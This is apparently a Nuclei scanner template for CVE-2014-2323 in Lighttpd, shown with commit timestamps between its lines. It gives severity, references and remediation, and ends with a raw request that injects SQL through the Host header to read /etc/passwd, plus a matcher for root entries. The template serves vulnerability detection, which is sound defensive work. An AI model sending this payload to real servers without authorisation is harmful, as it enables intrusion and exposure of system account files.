2021-07-26 17:18:45 +00:00
id : CVE-2014-2323
info :
2022-02-25 14:32:23 +00:00
name : Lighttpd 1.4.34 SQL Injection and Path Traversal
2022-04-22 10:38:41 +00:00
author : geeknik
severity : critical
2022-02-25 14:32:23 +00:00
description : A SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name (related to request_check_hostname).
2023-09-06 13:22:34 +00:00
remediation : |
Upgrade to a patched version of Lighttpd or apply the necessary security patches
2022-02-25 14:32:23 +00:00
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2014-2323
- https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt
- http://www.lighttpd.net/2014/3/12/1.4.35/
2022-05-17 09:18:12 +00:00
- http://seclists.org/oss-sec/2014/q1/561
2023-07-11 19:49:27 +00:00
- http://jvn.jp/en/jp/JVN37417423/index.html
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2014-2323
cwe-id : CWE-89
2023-10-14 11:27:55 +00:00
epss-score : 0.96758
epss-percentile : 0.99546
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:lighttpd:lighttpd:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : lighttpd
product : lighttpd
tags : lighttpd,injection,seclists,cve,cve2014,sqli
2021-07-26 17:18:45 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-26 17:18:45 +00:00
- raw :
- |+
GET /etc/passwd HTTP/1.1
Host : [ : : 1 ] ' UNION SELECT ' /
unsafe : true
matchers :
- type : regex
regex :
- "root:[x*]:0:0:"